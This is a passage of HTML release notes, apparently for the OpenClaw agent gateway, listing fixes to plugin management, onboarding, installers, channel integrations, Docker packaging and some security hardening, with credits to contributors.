<li>Plugins/compat: inventory doctor-side deprecation migrations separately from runtime plugin compatibility so release sweeps preserve needed repairs while enforcing dated removal windows. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</li>
<li>Plugins/compat: add missing dated compatibility records for legacy extension-api, memory registration, provider hook/type aliases, runtime aliases, channel SDK helpers, and approval/test utility shims. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</li>
<li>Plugins/CLI: refresh the persisted registry after managed plugin files are removed so ClawHub uninstall cannot leave stale <code>plugins list</code> entries. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/codex/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/codex">@codex</a>.</li>
<li>Plugins/CLI: make plugin install and uninstall config writes conflict-aware, clear stale denylist entries on explicit reinstall/removal, and delete managed plugin files only after config/index commit succeeds. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/codex/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/codex">@codex</a>.</li>
<li>Plugins: fail <code>plugins update</code> when tracked plugin or hook updates error, keep bundled runtime-dependency repair behind restrictive allowlists, and reject package installs with unloadable extension entries. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/codex/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/codex">@codex</a>.</li>
<li>Gateway/chat: keep duplicate attachment-backed <code>chat.send</code> retries with the same idempotency key on the documented in-flight path so aborts still target the real active run. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4308621432" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/70139" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/70139/hovercard" href="https://github.com/openclaw/openclaw/issues/70139">#70139</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Feelw00/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Feelw00">@Feelw00</a>.</li>
<li>Plugins: share package entrypoint resolution between install and discovery, reject mismatched <code>runtimeExtensions</code>, and cache bundled runtime-dependency manifest reads during scans. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/codex/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/codex">@codex</a>.</li>
<li>Onboarding/setup: keep first-run config reads, plugin compatibility notices, and post-model sanity checks on cold metadata paths unless the user chooses to browse all models, avoiding full plugin/runtime catalog work between prompts. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/shakkernerd/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/shakkernerd">@shakkernerd</a>.</li>
<li>Onboarding/auth: run manifest-owned provider auth choices through scoped setup providers so selecting OpenAI Codex browser/device auth no longer loads every provider runtime before OAuth starts. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/shakkernerd/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/shakkernerd">@shakkernerd</a>.</li>
<li>Onboarding/auth: keep the post-auth default-model policy lookup on manifest/setup metadata so the next prompt appears without loading broad provider runtime. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/shakkernerd/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/shakkernerd">@shakkernerd</a>.</li>
<li>Onboarding/models: keep skip-auth and provider-scoped model picker prompts off the full global model catalog path, and cache provider catalog hook resolution so setup no longer stalls after auth on large plugin registries. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/shakkernerd/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/shakkernerd">@shakkernerd</a>.</li>
<li>Gateway/Bonjour: suppress known @homebridge/ciao cancellation and network assertion failures through scoped process handlers so malformed mDNS packets or restricted VPS networking disable/restart Bonjour instead of crashing the gateway. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4274075946" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/67578" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/67578/hovercard" href="https://github.com/openclaw/openclaw/issues/67578">#67578</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/zenassist26-create/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/zenassist26-create">@zenassist26-create</a>.</li>
<li>Discord: keep late clicks on already-resolved exec approval buttons quiet when elevated mode auto-resolved the request, while still surfacing real approval submission failures. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4265667453" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/66906" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/66906/hovercard" href="https://github.com/openclaw/openclaw/issues/66906">#66906</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/rlerikse/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/rlerikse">@rlerikse</a>.</li>
<li>Agents/subagents: deliver completed yielded-subagent results back to no-thread requester routes via direct fallback when the dormant parent announce turn produces no visible reply, and add QA-lab coverage for the regression. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</li>
<li>Gateway/Tailscale: let Tailscale-authenticated Control UI operator sessions with browser device identity skip the device-pairing round trip while still rejecting device-less and node-role connections. Refs <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4330113557" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/71986" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/71986/hovercard" href="https://github.com/openclaw/openclaw/issues/71986">#71986</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/jokedul/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/jokedul">@jokedul</a>.</li>
<li>Doctor: honor <code>OPENCLAW_SERVICE_REPAIR_POLICY=external</code> by reporting gateway service health while skipping service install/start/restart/bootstrap, supervisor rewrites, and legacy service cleanup for externally managed environments. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/shakkernerd/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/shakkernerd">@shakkernerd</a>.</li>
<li>CLI/update: run package post-update doctor with <code>--fix</code> so package updates repair config migrations before restart. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/shakkernerd/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/shakkernerd">@shakkernerd</a>.</li>
<li>CLI/update: retry failed npm global updates with <code>--omit=optional</code> and ignore the superseded first failure when the fallback succeeds. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/shakkernerd/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/shakkernerd">@shakkernerd</a>.</li>
<li>Plugins/uninstall: migrate and reset <code>plugins.slots.contextEngine</code> alongside memory slots when plugin ids change or selected plugins are removed. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/shakkernerd/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/shakkernerd">@shakkernerd</a>.</li>
<li>Agents/Discord: keep raw <code>Agent failed before reply</code> runner failures out of Discord group/channel chats and show detailed runner errors in direct chats only when <code>/verbose</code> is enabled. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/codex/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/codex">@codex</a>.</li>
<li>UI/Windows: quote resolved pnpm <code>.cmd</code> launcher paths before spawning UI install/build/test commands so Node installs under <code>C:\Program Files</code> no longer fail as <code>C:\Program</code>. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4072094242" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/45275" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/45275/hovercard" href="https://github.com/openclaw/openclaw/issues/45275">#45275</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Kobevictor/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Kobevictor">@Kobevictor</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/stoppieboy/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/stoppieboy">@stoppieboy</a>, and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/iubns/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/iubns">@iubns</a>.</li>
<li>Codex/agent: translate <code>--thinking minimal</code> to <code>low</code> for modern Codex models (gpt-5.5, gpt-5.4, gpt-5.4-mini, gpt-5.2) at request build time so the first turn is accepted instead of paying a wasted call + retry-with-low fallback. Older Codex models still receive <code>minimal</code> directly. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4329994264" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/71946" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/71946/hovercard" href="https://github.com/openclaw/openclaw/issues/71946">#71946</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/hclsys/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/hclsys">@hclsys</a>.</li>
<li>Plugins/uninstall: remove tracked plugin files from their recorded managed extensions root even when the current state directory points somewhere else, so <code>openclaw plugins uninstall --force</code> does not leave the plugin discoverable. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/shakkernerd/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/shakkernerd">@shakkernerd</a>.</li>
<li>Agents/runtime: add <code>agentRuntime.id</code> as the canonical config key, migrate legacy runtime-policy configs with <code>openclaw doctor --fix</code>, route canonical Anthropic models through <code>claude-cli</code> without passing CLI backend aliases to embedded harness selection, and load CLI backend owner plugins before channel startup. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4330015913" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/71957" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/71957/hovercard" href="https://github.com/openclaw/openclaw/issues/71957">#71957</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/WolvenRA/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/WolvenRA">@WolvenRA</a>.</li>
<li>CLI/update: guard Windows scheduled-task stops by state and timeout so auto-update restart cannot hang indefinitely on <code>schtasks /End</code> before stale-listener cleanup. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4306617089" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/69970" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/69970/hovercard" href="https://github.com/openclaw/openclaw/issues/69970">#69970</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/yangswld/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/yangswld">@yangswld</a> and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/sherlock-huang/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/sherlock-huang">@sherlock-huang</a>.</li>
<li>Windows install/Lobster: execute <code>pnpm.exe</code> directly when <code>npm_execpath</code> points at the native pnpm binary, add an installed-package fallback for the Lobster embedded runtime, and include the Lobster runner regression test in Windows CI. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4298637607" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/69456" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/69456/hovercard" href="https://github.com/openclaw/openclaw/issues/69456">#69456</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/igormf/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/igormf">@igormf</a>.</li>
<li>Gateway/install: refresh loaded gateway service installs when the current service embeds stale gateway auth instead of returning already-installed, avoiding LaunchAgent token-mismatch loops after token rotation. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4318448606" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/70752" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/70752/hovercard" href="https://github.com/openclaw/openclaw/issues/70752">#70752</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/hyspacex/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/hyspacex">@hyspacex</a>.</li>
<li>Update: ignore bundled plugin <code>.openclaw-install-stage</code> directories during global install verification and packaged dist pruning so leftover runtime-dep staging files do not turn successful updates into <code>unexpected packaged dist file</code> failures. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4329154464" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/71752" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/71752/hovercard" href="https://github.com/openclaw/openclaw/issues/71752">#71752</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/waynegault/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/waynegault">@waynegault</a>.</li>
<li>CLI/update: fail package updates when post-update plugin sync fails and refresh legacy npm plugin install records before trusting unchanged artifacts, preventing successful updates from restarting with stale or failed plugin state. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a> and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/shakkernerd/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/shakkernerd">@shakkernerd</a>.</li>
<li>Release/update: reject pre-populated bundled plugin <code>.openclaw-install-stage</code> directories, including mixed-case path variants, before package inventory generation so release tarballs cannot ship poisoned runtime-dependency staging debris. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4329154464" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/71752" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/71752/hovercard" href="https://github.com/openclaw/openclaw/issues/71752">#71752</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/hclsys/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/hclsys">@hclsys</a>.</li>
<li>Node runtime: keep node-host retry timers alive across Gateway restarts and exit on terminal credential pauses so supervised nodes do not become silent zombies. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4304346722" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/69800" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/69800/hovercard" href="https://github.com/openclaw/openclaw/issues/69800">#69800</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/meroli28/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/meroli28">@meroli28</a>.</li>
<li>Gateway/plugins: stop persisted WhatsApp auth state from activating bundled channel runtime-dependency repair during startup when <code>channels.whatsapp</code> is absent, avoiding npm/git stalls on packaged Linux installs. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4330154277" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/71994" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/71994/hovercard" href="https://github.com/openclaw/openclaw/issues/71994">#71994</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/xiao398008/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/xiao398008">@xiao398008</a>.</li>
<li>Gateway/device tokens: enforce caller-scope containment inside token rotation and revocation so pairing-only sessions cannot mutate higher-scope operator tokens. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4330129522" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/71990" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/71990/hovercard" href="https://github.com/openclaw/openclaw/issues/71990">#71990</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/coygeek/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/coygeek">@coygeek</a>.</li>
<li>Plugins/channels: keep security checks, thread-binding placement, provider summaries, health formatting, and message action labels on read-only or already-loaded channel metadata instead of importing full channel runtime. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/shakkernerd/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/shakkernerd">@shakkernerd</a>.</li>
<li>Plugins/status: keep config-only channel labels and status security summaries from importing plugin runtime modules just to render metadata. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/shakkernerd/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/shakkernerd">@shakkernerd</a>.</li>
<li>Sessions/channels: stop group-session metadata from loading bundled channel runtime just to classify <code>#channel</code> subjects, using only already-loaded channel capabilities on that path. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/shakkernerd/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/shakkernerd">@shakkernerd</a>.</li>
<li>Plugins/channels: keep native command and native skill <code>auto</code> defaults on static channel metadata so config, audit, and command-list checks do not load channel runtime just to read those defaults. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/shakkernerd/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/shakkernerd">@shakkernerd</a>.</li>
<li>CLI/channels: keep channel remove selection and all-channel capabilities summaries on read-only plugin metadata, loading channel runtime only for the selected mutation path. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/shakkernerd/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/shakkernerd">@shakkernerd</a>.</li>
<li>CLI/models: keep Provider Index preview rows out of <code>models list --all --provider &lt;id&gt;</code> when the owning provider plugin is disabled, preserving config authority for cold catalog fallbacks. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/shakkernerd/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/shakkernerd">@shakkernerd</a>.</li>
<li>CLI/model runs: keep <code>openclaw infer model run</code> on explicit OpenRouter models from loading the full provider catalog or inheriting chat-agent silent-reply policy, restoring non-empty one-shot probe output. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4289787526" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/68791" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/68791/hovercard" href="https://github.com/openclaw/openclaw/issues/68791">#68791</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/limpredator/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/limpredator">@limpredator</a>.</li>
<li>Installer/macOS: rerun Homebrew install steps without the gum spinner when raw-mode ioctl failures occur, and avoid claiming <code>node@24</code> was installed when the Homebrew keg binary is missing. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4312670571" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/70411" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/70411/hovercard" href="https://github.com/openclaw/openclaw/issues/70411">#70411</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/1fanwang/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/1fanwang">@1fanwang</a> and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/dad-io/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/dad-io">@dad-io</a>.</li>
<li>Installer: load nvm before Node.js detection so <code>curl | bash</code> installs respect nvm-managed Node instead of stale system Node. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4093236636" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/49556" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/49556/hovercard" href="https://github.com/openclaw/openclaw/issues/49556">#49556</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/heavenlxj/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/heavenlxj">@heavenlxj</a>.</li>
<li>Installer/Windows: route PowerShell install failures through a top-level handler so <code>iwr ... | iex</code> returns control to the current shell while direct script-file runs still exit non-zero. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4034858716" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/38054" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/38054/hovercard" href="https://github.com/openclaw/openclaw/issues/38054">#38054</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/PwrSrg/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/PwrSrg">@PwrSrg</a>.</li>
<li>CLI/Volta: respawn raw <code>openclaw</code> CLI runs through the named <code>node</code> shim when the current Node executable resolves to <code>volta-shim</code>, avoiding direct shim execution failures in non-interactive shells. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4288940390" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/68672" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/68672/hovercard" href="https://github.com/openclaw/openclaw/issues/68672">#68672</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/sanchezm86/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/sanchezm86">@sanchezm86</a>.</li>
<li>Installer: warn when multiple npm global roots contain OpenClaw installs, showing active Node/npm/openclaw plus each install path and version so stale version-manager installs are visible. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4044590366" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/40839" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/40839/hovercard" href="https://github.com/openclaw/openclaw/issues/40839">#40839</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/zhixianio/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/zhixianio">@zhixianio</a>.</li>
<li>Cron/tasks: recover completed cron task ledger records from durable run logs and job state before marking them <code>lost</code>, reducing false <code>backing session missing</code> audit errors for isolated cron runs and keeping offline CLI audit from treating its empty local cron active-job set as authoritative. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4330026583" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/71963" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/71963/hovercard" href="https://github.com/openclaw/openclaw/issues/71963">#71963</a>.</li>
<li>Docker: copy patched dependency files into runtime images so downstream <code>pnpm install</code> layers keep working. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4293534495" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/69224" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/69224/hovercard" href="https://github.com/openclaw/openclaw/issues/69224">#69224</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/gucasbrg/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/gucasbrg">@gucasbrg</a>.</li>
<li>Package: include patched dependency files in the published npm package so downstream installs can resolve <code>patchedDependencies</code>. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4293534495" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/69224" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/69224/hovercard" href="https://github.com/openclaw/openclaw/issues/69224">#69224</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/gucasbrg/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/gucasbrg">@gucasbrg</a> and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</li>
<li>Plugins/channels: treat malformed bundled channel plugin loaders that return <code>undefined</code> as unavailable instead of crashing config and help paths. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4291595561" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/69044" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/69044/hovercard" href="https://github.com/openclaw/openclaw/issues/69044">#69044</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/frankhli843/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/frankhli843">@frankhli843</a> and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</li>
<li>Scripts/watch: show corrupted dependency package-config recovery guidance when <code>gateway:watch</code> fails during watcher startup, without double-logging unrelated import failures. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4184421615" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/58780" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/58780/hovercard" href="https://github.com/openclaw/openclaw/pull/58780">#58780</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/roytong9/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/roytong9">@roytong9</a> and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</li>
<li>Signal: read signal-cli RPC, health checks, and SSE events through Node's HTTP client so Node 24/25 fetch regressions do not break Signal sends or inbound events. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4112941905" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/51716" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/51716/hovercard" href="https://github.com/openclaw/openclaw/issues/51716">#51716</a> and <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4122411587" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/53040" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/53040/hovercard" href="https://github.com/openclaw/openclaw/issues/53040">#53040</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Barukimang/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Barukimang">@Barukimang</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/minupla/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/minupla">@minupla</a>, and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</li>
<li>Skills/Docker: run npm-backed skill dependency installs with an OpenClaw-managed user prefix so non-root Docker images do not write to <code>/usr/local</code>. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4193497158" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/59601" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/59601/hovercard" href="https://github.com/openclaw/openclaw/issues/59601">#59601</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/chanjarster/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/chanjarster">@chanjarster</a> and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</li>
